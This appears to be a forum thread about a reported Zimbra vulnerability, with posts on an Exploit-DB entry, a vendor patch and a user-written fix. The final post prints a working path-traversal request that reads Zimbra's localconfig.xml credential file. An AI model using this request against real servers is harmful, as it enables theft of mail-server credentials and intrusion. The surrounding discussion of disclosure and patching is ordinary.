zimbra 0-day
zimbra 0-day
It was published on Exploits Database by Offensive Security, I suppose you are aware of it, in this case sorry
zimbra 0-day
[quote user="maumar"]It was published on Exploits Database by Offensive Security, I suppose you are aware of it, in this case sorry[/QUOTE]Please file this in bugzilla.
zimbra 0-day
If anybody's interested, I've analyzed the bug and developed an independent fix for it.
I've posted everything on my blog, which sadly is in French.
I haven't taken the time to translate all this, but if some users or people working on Zimbra want to know more about what I did, just get in touch with me
I've posted everything on my blog, which sadly is in French.
I haven't taken the time to translate all this, but if some users or people working on Zimbra want to know more about what I did, just get in touch with me
zimbra 0-day
Hi,
Thank you for sharing your research. These issues were resolved with a patch for our 7.2.2 and 8.0.2 and subsequent releases in February of 2013.
--Quanah
Thank you for sharing your research. These issues were resolved with a patch for our 7.2.2 and 8.0.2 and subsequent releases in February of 2013.
--Quanah
--
Quanah Gibson-Mount
Product Architect, Symas http://www.symas.com/
OpenLDAP Core team http://www.openldap.org/project/
Quanah Gibson-Mount
Product Architect, Symas http://www.symas.com/
OpenLDAP Core team http://www.openldap.org/project/
zimbra 0-day
The exploit was advertised as a 0day, and I took the author's word for it.
I feel silly now, sorry about this!
I feel silly now, sorry about this!
zimbra 0-day
Better a false alarm than no alarm
zimbra 0-day
I updated my zimbra to 8.0.5 but exploid still working. Here is some quick fix for protection in Turkish but i think it can help,
http://www.bilgiguvenligi.gov.tr/kritik ... iklik.html
http://www.bilgiguvenligi.gov.tr/kritik ... iklik.html
zimbra 0-day
[quote user="anndro"]I updated my zimbra to 8.0.5 but exploid still working. Here is some quick fix for protection in Turkish but i think it can help,[/QUOTE]If you think this exploit still exists then file a report in bugzilla.
zimbra 0-day
Please could you post the big here so I can subscribe to it?
Thanks
Thanks
zimbra 0-day
I can confirm ,LFI working on last 8.0.5 and after 7.2.2
LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
http://www.exploit-db.com/exploits/30085/
LFI is located at :
/res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz?v=091214175450&skin=../../../../../../../../../opt/zimbra/conf/localconfig.xml%00
http://www.exploit-db.com/exploits/30085/